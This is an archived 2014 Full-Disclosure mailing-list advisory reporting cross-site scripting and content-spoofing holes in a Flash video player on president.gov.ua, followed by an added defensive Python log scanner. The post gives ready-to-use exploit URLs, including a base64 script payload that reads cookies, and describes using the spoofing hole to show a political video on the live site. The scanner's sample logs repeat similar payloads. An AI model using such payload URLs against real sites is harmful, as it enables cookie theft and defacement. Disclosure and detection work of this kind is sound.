Message-ID: <005601cf154b$96494b30$9b7a6fd5@pc>
Date: Sun, 19 Jan 2014 21:20:35 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities at president.gov.ua

Hello participants of Mailing List.

For those who didn't read my posts in social networks last night and at my web site, here is information about multiple vulnerabilities at president.gov.ua. There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities.

In January 2007 I made "presidents fiesta" - published multiple vulnerabilities at the web sites of the presidents of Ukraine, Russia, USA, Byelorussia and Slovakia. And here are new holes at the web site of the new president of Ukraine.

Cross-Site Scripting (WASC-08):

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://president.gov.ua/js/jw/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

http://president.gov.ua/js/jw/player.swf?config=http://site/1.xml

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Here is a nice example of using one of these holes. The video is "published" at the president's web site, in which Victor Yanukovich told about his corruption and criminal actions (in Ukrainian).

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

P.S. Photos and videos of current protest events in Kyiv, Ukraine, see on Twitter (including online video translation in my Twitter account).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
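As an added example that is not part of the original post, the following defender-side check scans web server access logs for requests to JW Player's player.swf whose URL-taking parameters (aboutlink, link, file, config, as used in the advisory above) carry a data: URI or point at a host other than the site's own. The log lines, the site hostname and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# player.swf parameters that accept a URL and were abused in the advisory:
# aboutlink/link are opened on click, file is the media to play,
# config is a remote XML configuration.
URL_PARAMS = ("aboutlink", "link", "file", "config")

# Minimal common-log-format parser: remote host, request line, status code.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (hypothetical traffic, not real captures).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jan/2014:21:20:35 +0200] "GET /js/jw/player.swf?file=/media/intro.flv HTTP/1.1" 200 512',
    '203.0.113.7 - - [19/Jan/2014:21:21:02 +0200] "GET /js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,QUJD HTTP/1.1" 200 512',
    '203.0.113.9 - - [19/Jan/2014:21:21:40 +0200] "GET /js/jw/player.swf?file=http://attacker.example/video.flv&autostart=true HTTP/1.1" 200 512',
    '203.0.113.9 - - [19/Jan/2014:21:22:11 +0200] "GET /js/jw/player.swf?config=http://attacker.example/1.xml HTTP/1.1" 200 512',
    '203.0.113.2 - - [19/Jan/2014:21:23:00 +0200] "GET /index.html HTTP/1.1" 200 4096',
]

def suspicious_params(target, own_host="site.example"):
    """Names of URL-taking player.swf parameters whose value is a data:/javascript:
    URI or names a host other than own_host; empty list for benign or non-player requests."""
    parts = urlsplit(target)
    if not parts.path.endswith("/player.swf"):
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)
    flagged = []
    for name in URL_PARAMS:
        for value in qs.get(name, []):
            lowered = value.strip().lower()
            value_host = urlsplit(value).hostname
            if lowered.startswith(("data:", "javascript:")) or (value_host and value_host != own_host):
                flagged.append(name)
                break
    return flagged

def scan_log(lines, own_host="site.example"):
    """Return (remote_host, request_target, flagged_params) for every suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        flagged = suspicious_params(m.group("target"), own_host)
        if flagged:
            hits.append((m.group("host"), m.group("target"), flagged))
    return hits

if __name__ == "__main__":
    for host, target, params in scan_log(SAMPLE_LOG):
        print(f"{host} -> {target} (suspicious: {', '.join(params)})")
```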